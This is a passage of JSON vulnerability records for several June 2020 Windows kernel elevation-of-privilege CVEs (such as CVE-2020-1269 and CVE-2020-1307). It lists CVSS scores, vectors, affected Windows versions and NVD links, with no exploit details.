7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-09T20:15:00", "type": "cve", "title": "CVE-2020-1264", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0986", "CVE-2020-1237", "CVE-2020-1246", "CVE-2020-1262", "CVE-2020-1264", "CVE-2020-1266", "CVE-2020-1269", "CVE-2020-1273", "CVE-2020-1274", "CVE-2020-1275", "CVE-2020-1276", "CVE-2020-1307", "CVE-2020-1316"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2020-1264", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-1264", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-04-28T21:39:23", "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0986, CVE-2020-1237, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1273, CVE-2020-1274, CVE-2020-1275, CVE-2020-1276, CVE-2020-1307, CVE-2020-1316.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-09T20:15:00", "type": "cve", "title": "CVE-2020-1269", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0986", "CVE-2020-1237", "CVE-2020-1246", "CVE-2020-1262", "CVE-2020-1264", "CVE-2020-1266", "CVE-2020-1269", "CVE-2020-1273", "CVE-2020-1274", "CVE-2020-1275", "CVE-2020-1276", "CVE-2020-1307", "CVE-2020-1316"], "modified": "2022-04-28T19:32:00", "cpe": ["cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:opensuse:leap:15.2", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:opensuse:leap:15.1", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2008:-"], "id": "CVE-2020-1269", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-1269", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:15.2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x64:*"]}, {"lastseen": "2022-03-23T12:35:48", "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0986, CVE-2020-1237, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1274, CVE-2020-1275, CVE-2020-1276, CVE-2020-1307, CVE-2020-1316.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-09T20:15:00", "type": "cve", "title": "CVE-2020-1273", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0986", "CVE-2020-1237", "CVE-2020-1246", "CVE-2020-1262", "CVE-2020-1264", "CVE-2020-1266", "CVE-2020-1269", "CVE-2020-1273", "CVE-2020-1274", "CVE-2020-1275", "CVE-2020-1276", "CVE-2020-1307", "CVE-2020-1316"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2016:1903"], "id": "CVE-2020-1273", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-1273", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:35:58", "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0986, CVE-2020-1237, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1273, CVE-2020-1275, CVE-2020-1276, CVE-2020-1307, CVE-2020-1316.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-09T20:15:00", "type": "cve", "title": "CVE-2020-1274", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0986", "CVE-2020-1237", "CVE-2020-1246", "CVE-2020-1262", "CVE-2020-1264", "CVE-2020-1266", "CVE-2020-1269", "CVE-2020-1273", "CVE-2020-1274", "CVE-2020-1275", "CVE-2020-1276", "CVE-2020-1307", "CVE-2020-1316"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2016:1903"], "id": "CVE-2020-1274", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-1274", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:36:08", "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0986, CVE-2020-1237, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1273, CVE-2020-1274, CVE-2020-1276, CVE-2020-1307, CVE-2020-1316.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-09T20:15:00", "type": "cve", "title": "CVE-2020-1275", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0986", "CVE-2020-1237", "CVE-2020-1246", "CVE-2020-1262", "CVE-2020-1264", "CVE-2020-1266", "CVE-2020-1269", "CVE-2020-1273", "CVE-2020-1274", "CVE-2020-1275", "CVE-2020-1276", "CVE-2020-1307", "CVE-2020-1316"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2016:1903"], "id": "CVE-2020-1275", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-1275", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:36:19", "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0986, CVE-2020-1237, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1273, CVE-2020-1274, CVE-2020-1275, CVE-2020-1307, CVE-2020-1316.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-09T20:15:00", "type": "cve", "title": "CVE-2020-1276", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0986", "CVE-2020-1237", "CVE-2020-1246", "CVE-2020-1262", "CVE-2020-1264", "CVE-2020-1266", "CVE-2020-1269", "CVE-2020-1273", "CVE-2020-1274", "CVE-2020-1275", "CVE-2020-1276", "CVE-2020-1307", "CVE-2020-1316"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2016:1903"], "id": "CVE-2020-1276", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-1276", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:42:31", "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0986, CVE-2020-1237, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1273, CVE-2020-1274, CVE-2020-1275, CVE-2020-1276, CVE-2020-1316.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T20:15:00", "type": "cve", "title": "CVE-2020-1307", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0986", "CVE-2020-1237", "CVE-2020-1246", "CVE-2020-1262", "CVE-2020-1264", "CVE-2020-1266", "CVE-2020-1269", "CVE-2020-1273", "CVE-2020-1274", "CVE-2020-1275", "CVE-2020-1276", "CVE-2020-1307", "CVE-2020-1316"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2016:1903"], "id": "CVE-2020-1307", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-1307", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:43:53", "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0986, CVE-2020-1237, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1273, CVE-2020-1274, CVE-2020-1275, CVE-2020-1276, CVE-2020-1307.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-09T20:15:00", "type": "cve", "title": "CVE-2020-1316", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0986", "CVE-2020-1237", "CVE-2020-1246", "CVE-2020-1262", "CVE-2020-1264", "CVE-2020-1266", "CVE-2020-1269", "CVE-2020-1273", "CVE-2020-1274", "CVE-2020-1275", "CVE-2020-1276", "CVE-2020-1307", "CVE-2020-1316"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2020-1316", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-1316", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:34:12", "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0986, CVE-2020-1237, CVE-2020-1246, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1273, CVE-2020-1274, CVE-2020-1275, CVE-2020-1276, CVE-2020-1307, CVE-2020-1316.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-09T20:15:00", "type": "cve", "title": "CVE-2020-1262", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0986", "CVE-2020-1237", "CVE-2020-1246", "CVE-2020-1262", "CVE-2020-1264", "CVE-2020-1266", "CVE-2020-1269", "CVE-2020-1273", "CVE-2020-1274", "CVE-2020-1275", "CVE-2020-1276", "CVE-2020-1307", "CVE-2020-1316"], "modified": 